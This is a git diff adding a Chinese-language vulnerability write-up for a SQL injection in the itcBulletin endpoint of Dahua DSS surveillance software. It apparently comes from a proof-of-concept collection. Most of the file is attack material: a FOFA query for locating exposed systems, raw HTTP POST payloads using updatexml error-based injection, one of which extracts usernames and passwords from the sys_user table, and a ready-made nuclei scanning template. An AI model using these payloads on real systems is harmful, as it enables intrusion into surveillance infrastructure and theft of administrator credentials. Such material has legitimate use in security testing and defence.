diff --git a/大华DSS itcBulletin SQL 注入漏洞.md b/大华DSS itcBulletin SQL 注入漏洞.md
new file mode 100644
index 0000000..33e11de
--- /dev/null
+++ b/大华DSS itcBulletin SQL 注入漏洞.md
@@ -0,0 +1,80 @@
+## 大华DSS itcBulletin SQL 注入漏洞
+大华DSS数字监控系统itcBulletin接口存在SQL注入漏洞,攻击者可以利用该漏洞获取数据库敏感信息。
+
+## fofa
+```
+app="dahua-DSS"
+```
+
+## poc
+```
+POST /portal/services/itcBulletin?wsdl HTTP/1.1
+Host: x.x.x.x
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Connection: close
+Content-Length: 345
+Accept-Encoding: gzip
+
+
+
+
+
+ (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
+
+
+
+
+
+
+POST /portal/services/itcBulletin?wsdl HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Accept-Encoding: gzip
+
+
+
+
+
+ (updatexml(1,concat(0x7e,(select substr(group_concat(login_name, " ",login_pass),1,30) from sys_user),0x7e),1))) and (1=1
+
+
+
+
+
+```
+
+## nuclei poc
+```
+id: dahua-dss-itcBulletin-sqli
+info:
+ name: 大华DSS itcBulletin SQL注入漏洞
+ author: fgz
+ severity: high
+ description: 大华DSS数字监控系统itcBulletin接口存在SQL注入漏洞,攻击者可以利用该漏洞获取数据库敏感信息。
+ metadata:
+ fofa-query: app="dahua-DSS"
+
+requests:
+ - raw:
+ - |+
+ POST /portal/services/itcBulletin?wsdl HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+
+
+
+
+
+ (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
+
+
+
+
+
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code==500 && contains(body,"error code [1105]") && contains(body,"6cfe798ba8e5b85feb50164c59f4bec")'
+```